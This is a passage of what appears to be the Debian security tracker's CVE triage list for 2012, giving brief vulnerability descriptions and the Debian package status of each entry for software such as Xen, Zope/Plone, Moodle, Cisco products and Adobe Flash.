	[squeeze] - xen (Only affects Xen 4.1)
CVE-2012-5511 (Stack-based buffer overflow in the dirty video RAM tracking ...)
	{DSA-2636-1}
	- xen 4.1.3-5
CVE-2012-5510 (Xen 4.x, when downgrading the grant table version, does not properly ...)
	{DSA-2582-1}
	- xen 4.1.3-5
CVE-2012-5509 (aeolus-configserver-setup in the Aeolas Configuration Server, as used ...)
	NOT-FOR-US: Aeolus Cloud Configuration tool (not the pipe organ simulator in Debian)
CVE-2012-5508 [Zope/Plone: PRNG isn't reseeded]
	RESERVED
	- zope2.12 2.12.26-1 (bug #692899)
	NOTE: https://plone.org/products/plone/security/advisories/20121106/24
CVE-2012-5507 [Zope/Plone: Timing attack in password validation]
	RESERVED
	- zope2.12 2.12.26-1 (bug #692899)
	NOTE: https://plone.org/products/plone/security/advisories/20121106/23
CVE-2012-5506 [Zope/Plone: DoS through RSS on private folder]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5505 [Zope/Plone: Attempting to access a view with no name returns an internal data structure]
	RESERVED
	- zope2.12 2.12.26-1 (bug #692899)
	NOTE: https://plone.org/products/plone/security/advisories/20121106/21
CVE-2012-5504 [Zope/Plone: Persistent XSS]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5503 [Zope/Plone: Users connected through FTP can list hidden folder contents]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5502 [Zope/Plone: Persistent XSS via filtering bypass]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5501 [Zope/Plone: Crafted URL allows downloading of BLOBs that are not visible to the user]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5500 [Zope/Plone: Anonymous users can batch change titles of content items]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5499 [Zope/Plone: Partial denial of service through internal function]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5498 [Zope/Plone: Partial denial of service through Collections functionality]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5497 [Zope/Plone: Anonymous users can list user account names]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5496 [Zope/Plone: DoS through unsanitised inputs into Kupu]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5495 [Zope/Plone: Restricted Python injection]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5494 [Zope/Plone: Reflexive XSS]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5493 [Zope/Plone: Restricted Python sandbox escape]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5492 [Zope/Plone: Partial permissions bypass]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5491 [Zope/Plone: Form detail exposure]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5490 [Zope/Plone: Reflexive XSS]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5489 [Zope/Plone: Partial restricted Python sandbox escape]
	RESERVED
	- zope2.12 (bug #692899)
	NOTE: https://plone.org/products/plone/security/advisories/20121106/05
CVE-2012-5488 [Zope/Plone: Restricted Python injection]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
CVE-2012-5487 [Zope/Plone: Restricted Python sandbox escape]
	RESERVED
	- zope2.12 (unimportant; bug #692899)
	NOTE: Non-issue, see http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=692899#20
CVE-2012-5486 [Zope/Plone: Reflexive HTTP header injection]
	RESERVED
	- zope2.12 2.12.26-1 (bug #692899)
	NOTE: https://plone.org/products/plone/security/advisories/20121106/02
CVE-2012-5485 [Restricted Python injection]
	RESERVED
	NOT-FOR-US: Plone not packaged in Debian, see bug #692899
	NOTE: https://plone.org/products/plone/security/advisories/20121106/01
CVE-2012-5484 (The client in FreeIPA 2.x and 3.x before 3.1.2 does not properly ...)
	NOT-FOR-US: FreeIPA
CVE-2012-5483 (tools/sample_data.sh in OpenStack Keystone 2012.1.3, when access to ...)
- keystone (Debian packaging enforces correct permissions) CVE-2012-5482 (The v2 API in OpenStack Glance Grizzly, Folsom (2012.2), and Essex ...) - glance 2012.1.1-3 (bug #692641) CVE-2012-5481 (Moodle 2.3.x before 2.3.3 allows remote authenticated users to bypass ...) - moodle (Doesn't affect 1.9 or 2.2) CVE-2012-5480 (The Database activity module in Moodle 2.1.x before 2.1.9, 2.2.x ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5479 (The Portfolio plugin in Moodle 2.1.x before 2.1.9, 2.2.x before 2.2.6, ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5478 (The AuthorizationInterceptor in JBoss Enterprise Application Platform ...) - jbossas4 (Only builds a few libraries, not the full application server, #581226) CVE-2012-5477 RESERVED CVE-2012-5476 RESERVED - horizon (File is installed with 0700 perms in Debian) CVE-2012-5475 [YUI 2.x security issue regarding embedded SWF files] REJECTED CVE-2012-5474 RESERVED - horizon 2012.1.1-7 CVE-2012-5473 (The Database activity module in Moodle 2.1.x before 2.1.9, 2.2.x ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5472 (lib/formslib.php in Moodle 2.2.x before 2.2.6 and 2.3.x before 2.3.3 ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5471 (The Dropbox Repository File Picker in Moodle 2.1.x before 2.1.9, 2.2.x ...) - moodle 2.2.3.dfsg-2.6 [wheezy] - moodle 2.2.3.dfsg-2.6~wheezy0 [squeeze] - moodle (Doesn't affect 1.9) CVE-2012-5470 (libpng_plugin in VideoLAN VLC media player 2.0.3 allows remote ...) - vlc 2.0.4-1 (bug #692130) [wheezy] - vlc 2.0.3-4 [squeeze] - vlc (Minor issue) CVE-2012-5469 (The Portable phpMyAdmin plugin before 1.3.1 for WordPress allows ...) 
NOT-FOR-US: Wordpress plugin CVE-2012-5468 (Heap-based buffer overflow in iconvert.c in the bogolexer component in ...) {DSA-2585-1} - bogofilter 1.2.2+dfsg1-2 (bug #695139) CVE-2012-5467 RESERVED CVE-2012-5466 RESERVED CVE-2012-5465 RESERVED CVE-2012-5464 RESERVED CVE-2012-5463 RESERVED CVE-2012-5462 RESERVED CVE-2012-5461 RESERVED CVE-2012-5460 RESERVED CVE-2012-5459 (Untrusted search path vulnerability in VMware Workstation 8.x before ...) NOT-FOR-US: VMware CVE-2012-5458 (VMware Workstation 8.x before 8.0.5 and VMware Player 4.x before 4.0.5 ...) NOT-FOR-US: VMware CVE-2012-5457 RESERVED CVE-2012-5456 (The Zoner AntiVirus Free application for Android does not verify that ...) NOT-FOR-US: Zoner AntiVirus Free CVE-2012-5455 (Cross-site scripting (XSS) vulnerability in the language search ...) NOT-FOR-US: Joomla! component CVE-2012-5454 (user/index_inline_editor_submit.php in ATutor AContent 1.2-1 does not ...) NOT-FOR-US: ATutor AContent CVE-2012-5453 (SQL injection vulnerability in user/index_inline_editor_submit.php in ...) NOT-FOR-US: ATutor AContent CVE-2012-5452 (Multiple cross-site scripting (XSS) vulnerabilities in Subrion CMS ...) NOT-FOR-US: Subrion CMS CVE-2011-5212 (SQL injection vulnerability in admin/index.php in Subrion CMS 2.0.4 ...) NOT-FOR-US: Subrion CMS CVE-2011-5211 (Cross-site scripting (XSS) vulnerability in the poll module in Subrion ...) NOT-FOR-US: Subrion CMS CVE-2012-5451 RESERVED CVE-2012-5450 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: CMS Made Simple CVE-2012-5449 RESERVED CVE-2012-5448 RESERVED CVE-2012-5447 RESERVED CVE-2012-5446 RESERVED CVE-2012-5445 (The kernel in Cisco Native Unix (CNU) on Cisco Unified IP Phone 7900 ...) NOT-FOR-US: Cisco Native Unix CVE-2012-5444 (Cisco TelePresence Video Communication Server (VCS) X7.0.3 does not ...) 
NOT-FOR-US: Cisco TelePresence Video Communication Server CVE-2012-5443 RESERVED CVE-2012-5442 RESERVED CVE-2012-5441 RESERVED CVE-2012-5440 RESERVED CVE-2012-5439 RESERVED CVE-2012-5438 RESERVED CVE-2012-5437 RESERVED CVE-2012-5436 RESERVED CVE-2012-5435 RESERVED CVE-2012-5434 RESERVED CVE-2012-5433 RESERVED CVE-2012-5432 RESERVED CVE-2012-5431 RESERVED CVE-2012-5430 RESERVED CVE-2012-5429 (The VPN driver in Cisco VPN Client on Windows does not properly ...) NOT-FOR-US: Cisco VPN Client CVE-2012-5428 RESERVED CVE-2012-5427 RESERVED CVE-2012-5426 RESERVED CVE-2012-5425 RESERVED CVE-2012-5424 (Cisco Secure Access Control System (ACS) 5.x before 5.2 Patch 11 and ...) NOT-FOR-US: Cisco CVE-2012-5423 RESERVED CVE-2012-5422 RESERVED CVE-2012-5421 RESERVED CVE-2012-5420 RESERVED CVE-2012-5419 (Cisco Adaptive Security Appliance (ASA) software 8.7.1 and 8.7.1.1 for ...) NOT-FOR-US: Cisco Adaptive Security Appliance CVE-2012-5418 RESERVED CVE-2012-5417 (Cisco Prime Data Center Network Manager (DCNM) before 6.1(1) does not ...) NOT-FOR-US: Cisco CVE-2012-5416 (Buffer overflow in Cisco Unified MeetingPlace Web Conferencing before ...) NOT-FOR-US: Cisco CVE-2012-5415 (Race condition on Cisco Adaptive Security Appliances (ASA) devices ...) NOT-FOR-US: Cisco CVE-2012-5414 RESERVED CVE-2012-5413 RESERVED CVE-2012-5412 RESERVED CVE-2012-5411 RESERVED CVE-2012-5410 RESERVED CVE-2012-5409 (AscoServer.exe in the server in Siemens SiPass integrated MP2.6 and ...) 
NOT-FOR-US: Siemens SiPass CVE-2012-5408 RESERVED CVE-2012-5407 RESERVED CVE-2012-5406 RESERVED CVE-2012-5405 RESERVED CVE-2012-5404 RESERVED CVE-2012-5403 RESERVED CVE-2012-5402 RESERVED CVE-2012-5401 RESERVED CVE-2012-5400 RESERVED CVE-2012-5399 RESERVED CVE-2012-5398 RESERVED CVE-2012-5397 RESERVED CVE-2012-5396 RESERVED CVE-2012-5395 RESERVED NOT-FOR-US: Mediawiki extension CentralAuth CVE-2012-5394 RESERVED CVE-2012-5393 RESERVED CVE-2012-5392 RESERVED CVE-2012-5391 RESERVED - mediawiki 1:1.19.3-1 (bug #694998) [squeeze] - mediawiki 1:1.15.5-2squeeze5 CVE-2012-5390 [Possible privilege escalation] RESERVED - condor (standard universe is disabled in the Debian package, see bug #697936) NOTE: http://research.cs.wisc.edu/htcondor/security/vulnerabilities/CONDOR-2012-0003.html CVE-2012-5389 RESERVED CVE-2012-5388 (Cross-site scripting (XSS) vulnerability in wlcms-plugin.php in the ...) NOT-FOR-US: White Label CMS CVE-2012-5387 (Cross-site request forgery (CSRF) vulnerability in wlcms-plugin.php in ...) NOT-FOR-US: WordPress plugin White Label CMS CVE-2012-5386 (Directory traversal vulnerability in index.php in phpPaleo 4.8b180 ...) NOT-FOR-US: phpPaleo CVE-2012-5385 (install/index.php in Craig Knudsen WebCalendar before 1.2.5 allows ...) - webcalendar CVE-2012-5384 (Multiple cross-site scripting (XSS) vulnerabilities in Craig Knudsen ...) - webcalendar CVE-2012-5376 (The Inter-process Communication (IPC) implementation in Google Chrome ...) - chromium-browser 22.0.1229.94~r161065-1 CVE-2012-5375 (The CRC32C feature in the Btrfs implementation in the Linux kernel ...) - linux 3.8-1 (unimportant) - linux-2.6 (unimportant) NOTE: btrfs support in Squeeze/Wheezy is not ready for production use CVE-2012-5374 (The CRC32C feature in the Btrfs implementation in the Linux kernel ...) 
- linux 3.8-1 (unimportant) - linux-2.6 (unimportant) NOTE: btrfs support in Squeeze/Wheezy is not ready for production use CVE-2012-5373 (Oracle Java SE 7 and earlier, and OpenJDK 7 and earlier, computes hash ...) - openjdk-6 - openjdk-7 CVE-2012-5372 (Rubinius computes hash values without properly restricting the ability ...) - rubinius (bug #591817) CVE-2012-5371 (Ruby (aka CRuby) 1.9 before 1.9.3-p327 and 2.0 before r37575 computes ...) - ruby1.8 (Only affects 1.9.x) - ruby1.9.1 1.9.3.194-4 (bug #693024) CVE-2012-5370 (JRuby computes hash values without properly restricting the ability to ...) - jruby 1.5.6-5 (bug #694694) [squeeze] - jruby (Non-free not supported) CVE-2012-5369 RESERVED CVE-2012-5368 (phpMyAdmin 3.5.x before 3.5.3 uses JavaScript code that is obtained ...) - phpmyadmin (Only affects 3.5.x, not packaged yet, see #691728) CVE-2012-5367 (Multiple SQL injection vulnerabilities in OrangeHRM 2.7.1 RC 1 allow ...) NOT-FOR-US: OrangeHRM CVE-2012-5366 RESERVED NOT-FOR-US: Mac OS X CVE-2012-5365 RESERVED - kfreebsd-8 (low; bug #690986) - kfreebsd-9 (low) [squeeze] - kfreebsd-8 (Minor issue) [squeeze] - kfreebsd-9 (Minor issue) [wheezy] - kfreebsd-8 (Minor issue) [wheezy] - kfreebsd-9 (Minor issue) CVE-2012-5364 RESERVED NOT-FOR-US: Microsoft Windows CVE-2012-5363 RESERVED - kfreebsd-8 (low; bug #690986) [squeeze] - kfreebsd-8 (Minor issue) [squeeze] - kfreebsd-9 (Minor issue) [wheezy] - kfreebsd-8 (Minor issue) [wheezy] - kfreebsd-9 (Minor issue) - kfreebsd-9 (low) CVE-2012-5362 RESERVED NOT-FOR-US: Microsoft Windows CVE-2012-5361 RESERVED - ffmpeg - libav 6:0.8.5-1 (bug #694483) NOTE: http://technet.microsoft.com/en-us/security/msvr/msvr12-017 NOTE: upstream needs a proper sample to reproduce the issue CVE-2012-5360 RESERVED - ffmpeg - libav 6:0.8.5-1 (bug #694483) NOTE: http://technet.microsoft.com/en-us/security/msvr/msvr12-017 NOTE: upstream needs a proper sample to reproduce the issue CVE-2012-5359 RESERVED - ffmpeg - libav 6:0.8.5-1 (bug #694483) 
NOTE: http://technet.microsoft.com/en-us/security/msvr/msvr12-017 NOTE: upstream needs a proper sample to reproduce the issue CVE-2012-5358 RESERVED CVE-2012-5357 RESERVED CVE-2012-5356 (The apt-add-repository tool in Ubuntu Software Properties 0.75.x ...) NOT-FOR-US: apt-add-repository CVE-2012-5355 (welcome.py in xdiagnose before 2.5.2ubuntu0.1 allows local users to ...) NOT-FOR-US: xdiagnose CVE-2012-5354 (Mozilla Firefox before 16.0, Thunderbird before 16.0, and SeaMonkey ...) - iceape (Only affects 16.x release from experimental) - iceweasel (Only affects 16.x release from experimental) - icedove (Only affects 16.x release from experimental) CVE-2012-5383 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) - mysql-5.1 (Windows issue only) - mysql-5.5 (Windows issue only) CVE-2012-5382 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) NOT-FOR-US: Zend Server CVE-2012-5381 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) - php5 (Windows issue only) CVE-2012-5380 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) - ruby1.8 (Windows issue only) - ruby1.9.1 (Windows issue only) CVE-2012-5379 (** DISPUTED ** Untrusted search path vulnerability in the installation ...) NOT-FOR-US: ActivePython CVE-2012-5378 (Untrusted search path vulnerability in the installation functionality ...) NOT-FOR-US: ActiveTcl CVE-2012-5377 (Untrusted search path vulnerability in the installation functionality ...) NOT-FOR-US: ActivePerl CVE-2012-5353 (Eduserv OpenAthens SP 2.0 for Java allows remote attackers to forge ...) NOT-FOR-US: Eduserv CVE-2012-5352 (Java Open Single Sign-On Project Home (JOSSO) allows remote attackers ...) NOT-FOR-US: josso CVE-2012-5351 (Apache Axis2 allows remote attackers to forge messages and bypass ...) - axis2c (low; bug #690421) CVE-2012-5350 (SQL injection vulnerability in the Pay With Tweet plugin before 1.2 ...) 
NOT-FOR-US: wp Pay With Tweet plugin CVE-2012-5349 (Multiple cross-site scripting (XSS) vulnerabilities in pay.php in the ...) NOT-FOR-US: wp Pay With Tweet plugin CVE-2012-5348 (SQL injection vulnerability in MangosWeb Enhanced 3.0.3 allows remote ...) NOT-FOR-US: MangosWeb CVE-2012-5347 (TinyWebGallery 1.8.3 allows remote attackers to execute arbitrary code ...) NOT-FOR-US: TinyWebGallery CVE-2012-5346 (Cross-site scripting (XSS) vulnerability in wp-live.php in the WP ...) NOT-FOR-US: WP live plugin CVE-2012-5345 (Buffer overflow in the Remote command server (Rcmd.bat) in IpTools ...) NOT-FOR-US: batch file CVE-2012-5344 (Directory traversal vulnerability in the WebServer (Thttpd.bat) in ...) NOT-FOR-US: batch file CVE-2012-5343 (Cross-site scripting (XSS) vulnerability in admin/login.php in Limny ...) NOT-FOR-US: Limny CVE-2012-5342 (Multiple SQL injection vulnerabilities in SenseSites CommonSense CMS ...) NOT-FOR-US: SenseSites CommonSense CVE-2012-5341 (Multiple cross-site scripting (XSS) vulnerabilities in statistik.php ...) NOT-FOR-US: Otterware StatIt CVE-2011-5210 (Directory traversal vulnerability in admin/preview.php in Limny 3.0.0 ...) NOT-FOR-US: Limny CVE-2011-5209 (Cross-site scripting (XSS) vulnerability in search/ in GraphicsClone ...) NOT-FOR-US: GraphicsClone CVE-2012-5340 RESERVED CVE-2012-5339 (Multiple cross-site scripting (XSS) vulnerabilities in phpMyAdmin ...) - phpmyadmin (Only affects 3.5.x, not packaged yet, see #691728) CVE-2012-5338 RESERVED CVE-2012-5337 (Multiple cross-site scripting (XSS) vulnerabilities in jforum.page in ...) NOT-FOR-US: jForum CVE-2012-5336 RESERVED CVE-2012-5335 (Directory traversal vulnerability in Tiny Server 1.1.5 allows remote ...) NOT-FOR-US: Tiny Server CVE-2012-5334 (SQL injection vulnerability in product_desc.php in Pre Printing Press ...) NOT-FOR-US: Pre Printing Press CVE-2012-5333 (SQL injection vulnerability in page.php in Pre Printing Press allows ...) 
NOT-FOR-US: Pre Printing Press CVE-2012-5332 (at32 Reverse Proxy 1.060.310 allows remote attackers to cause a denial ...) NOT-FOR-US: at32 Reverse Proxy CVE-2012-5331 (Directory traversal vulnerability in asaanCart 0.9 allows remote ...) NOT-FOR-US: asaanCart CVE-2012-5330 (Multiple cross-site scripting (XSS) vulnerabilities in asaanCart 0.9 ...) NOT-FOR-US: asaanCart CVE-2012-5329 (Buffer overflow in TYPSoft FTP Server 1.1 allows remote authenticated ...) NOT-FOR-US: TYPSoft FTP CVE-2012-5328 (Multiple SQL injection vulnerabilities in the Mingle Forum plugin ...) NOT-FOR-US: WP Mingle Forum CVE-2012-5327 (Multiple SQL injection vulnerabilities in fs-admin/fs-admin.php in the ...) NOT-FOR-US: WP Mingle Forum CVE-2012-5326 (Cross-site request forgery (CSRF) vulnerability in admin/function.php ...) NOT-FOR-US: IDevSpot iSupport CVE-2012-5325 (Multiple cross-site scripting (XSS) vulnerabilities in the ...) NOT-FOR-US: WP Shortcode CVE-2012-5324 (Multiple buffer overflows in the Pdf Printer Preferences ActiveX ...) NOT-FOR-US: PDF-XChange CVE-2012-5323 (Cross-site request forgery (CSRF) vulnerability in ...) NOT-FOR-US: Xavi ADSL router CVE-2012-5322 (Multiple cross-site scripting (XSS) vulnerabilities in Xavi X7968 ...) NOT-FOR-US: Xavi ADSL router CVE-2012-5321 (tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote ...) - tikiwiki CVE-2012-5320 (Cross-site request forgery (CSRF) vulnerability in password.cgi in ...) NOT-FOR-US: Sagem CVE-2012-5319 (Cross-site request forgery (CSRF) vulnerability in setup/security.cgi ...) NOT-FOR-US: D-link CVE-2012-5318 (Unrestricted file upload vulnerability in ...) NOT-FOR-US: WP Kish CVE-2012-5317 (SQL injection vulnerability in main_bigware_43.php in Bigware Shop ...) NOT-FOR-US: Bigware Shop CVE-2012-5316 (Multiple cross-site scripting (XSS) vulnerabilities in Barracuda Spam ...) NOT-FOR-US: Barracuda CVE-2012-5315 (Multiple cross-site scripting (XSS) vulnerabilities in php ireport 1.0 ...) 
NOT-FOR-US: iReport CVE-2012-5314 (Cross-site scripting (XSS) vulnerability in ViewGit 0.0.6 and earlier ...) NOT-FOR-US: ViewGit CVE-2012-5313 (SQL injection vulnerability in forum.asp in Snitz Forums 2000 allows ...) NOT-FOR-US: Snitz Forums CVE-2012-5312 (SQL injection vulnerability in Tribiq CMS allows remote attackers to ...) NOT-FOR-US: Tribiq CMS CVE-2012-5311 REJECTED CVE-2012-5310 (SQL injection vulnerability in the WP e-Commerce plugin before 3.8.7.6 ...) NOT-FOR-US: WP e-Commerce plugin CVE-2012-5309 (servlet/traveler in IBM Lotus Notes Traveler through 8.5.3.3 Interim ...) NOT-FOR-US: Lotus Notes CVE-2012-5308 (Cross-site request forgery (CSRF) vulnerability in servlet/traveler in ...) NOT-FOR-US: Lotus Notes CVE-2012-5307 (Cross-site scripting (XSS) vulnerability in servlet/traveler in IBM ...) NOT-FOR-US: Lotus Notes CVE-2012-5306 (Stack-based buffer overflow in the SelectDirectory method in ...) NOT-FOR-US: D-Link CVE-2012-5305 (Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC ...) NOT-FOR-US: DirectAdmin CVE-2012-5304 (Static code injection vulnerability in administration/install.php in ...) NOT-FOR-US: YVS CVE-2012-5303 (Monkey HTTP Daemon 0.9.3 might allow local users to overwrite ...) - monkey (unimportant) CVE-2012-5302 (The server in TIBCO Formvine 3.1.x and 3.2.x before 3.2.1 does not ...) NOT-FOR-US: TIBCO Formvine CVE-2011-5208 (Multiple directory traversal vulnerabilities in the BackWPup plugin ...) NOT-FOR-US: BackWPup CVE-2010-5279 (article.php in Virtual War (aka VWar) 1.6.1 R2 allows remote attackers ...) NOT-FOR-US: VWar CVE-2010-5278 (Directory traversal vulnerability in ...) NOT-FOR-US: MODx Revolution CVE-2010-5277 (Unspecified vulnerability in the Views Bulk Operations module 6 before ...) NOT-FOR-US: Drupal Views Bulk Operations CVE-2010-5276 (The Memcache module 5.x before 5.x-1.10 and 6.x before 6.x-1.6 for ...) 
NOT-FOR-US: Drupal Memcache CVE-2010-5275 (Cross-site scripting (XSS) vulnerability in memcache_admin in the ...) NOT-FOR-US: Drupal Memcache CVE-2012-5301 (The default configuration of Cerberus FTP Server before 5.0.4.0 ...) NOT-FOR-US: Cerberus CVE-2012-5300 (SQL injection vulnerability in art_catalogo.php in MyStore Xpress ...) NOT-FOR-US: MyStore Xpress CVE-2012-5299 (Mavili Guestbook, as released in November 2007, allows remote attackers to ...) NOT-FOR-US: Mavili Guestbook CVE-2012-5298 (Mavili Guestbook, as released in November 2007, stores guestbook.mdb under ...) NOT-FOR-US: Mavili Guestbook CVE-2012-5297 (SQL injection vulnerability in edit.asp in Mavili Guestbook, as ...) NOT-FOR-US: Mavili Guestbook CVE-2012-5296 (Multiple cross-site scripting (XSS) vulnerabilities in Mavili ...) NOT-FOR-US: Mavili Guestbook CVE-2012-5295 (Cross-site scripting (XSS) vulnerability in login.cfm in FuseTalk ...) NOT-FOR-US: FuseTalk CVE-2012-5294 (SQL injection vulnerability in art_detalle.php in MyStore Xpress ...) NOT-FOR-US: MyStore Xpress CVE-2012-5293 (Multiple PHP remote file inclusion vulnerabilities in SAPID CMS 1.2.3 ...) NOT-FOR-US: SAPID CMS CVE-2012-5292 (Multiple SQL injection vulnerabilities in Atar2b CMS 4.0.1 allow ...) NOT-FOR-US: Atar2b CVE-2012-5291 (SQL injection vulnerability in team.php in Posse Softball Director CMS ...) NOT-FOR-US: Posse Softball Director CVE-2012-5290 (Multiple SQL injection vulnerabilities in EasyWebRealEstate allow ...) NOT-FOR-US: EasyWebRealEstate CVE-2012-5289 (Multiple SQL injection vulnerabilities in Plogger 1.0 RC1 allow remote ...) NOT-FOR-US: Plogger CVE-2012-5288 (SQL injection vulnerability in page.php in phpMyDirectory 1.3.3 allows ...) NOT-FOR-US: phpMyDirectory CVE-2011-5207 (Cross-site scripting (XSS) vulnerability in admin/OptionsPostsList.php ...) NOT-FOR-US: WP TheCartPress CVE-2011-5206 (Cross-site scripting (XSS) vulnerability in notes.php in Rapidleech ...) 
NOT-FOR-US: Rapidleech CVE-2011-5205 (Cross-site scripting (XSS) vulnerability in audl.php in Rapidleech 2.3 ...) NOT-FOR-US: Rapidleech CVE-2011-5204 (Akiva WebBoard 8.x stores passwords in plaintext, which allows local ...) NOT-FOR-US: Akiva WebBoard CVE-2011-5203 (SQL injection vulnerability in WB/Default.asp in Akiva WebBoard before ...) NOT-FOR-US: Akiva WebBoard CVE-2012-XXXX [gunicorn fails to drop supplemental groups] - gunicorn 0.14.5-3 (low) [squeeze] - gunicorn (Minor issue) CVE-2012-5287 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5286 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5285 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5284 RESERVED CVE-2012-5283 RESERVED CVE-2012-5282 RESERVED CVE-2012-5281 RESERVED CVE-2012-5280 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5279 (Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5278 (Adobe Flash Player before 10.3.183.43 and 11.x before 11.5.502.110 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5277 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5276 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5275 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5274 (Buffer overflow in Adobe Flash Player before 10.3.183.43 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5273 (Buffer overflow in Adobe Shockwave Player before 11.6.8.638 allows ...) NOT-FOR-US: Adobe Shockwave CVE-2012-5272 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) 
NOT-FOR-US: Adobe Flash Player CVE-2012-5271 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5270 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5269 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5268 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5267 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5266 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5265 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5264 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5263 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5262 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5261 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5260 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5259 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5258 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5257 (Buffer overflow in Adobe Flash Player before 10.3.183.29 and 11.x ...) NOT-FOR-US: Adobe Flash Player CVE-2012-5256 (Adobe Flash Player before 10.3.183.29 and 11.x before 11.4.402.287 on ...) 
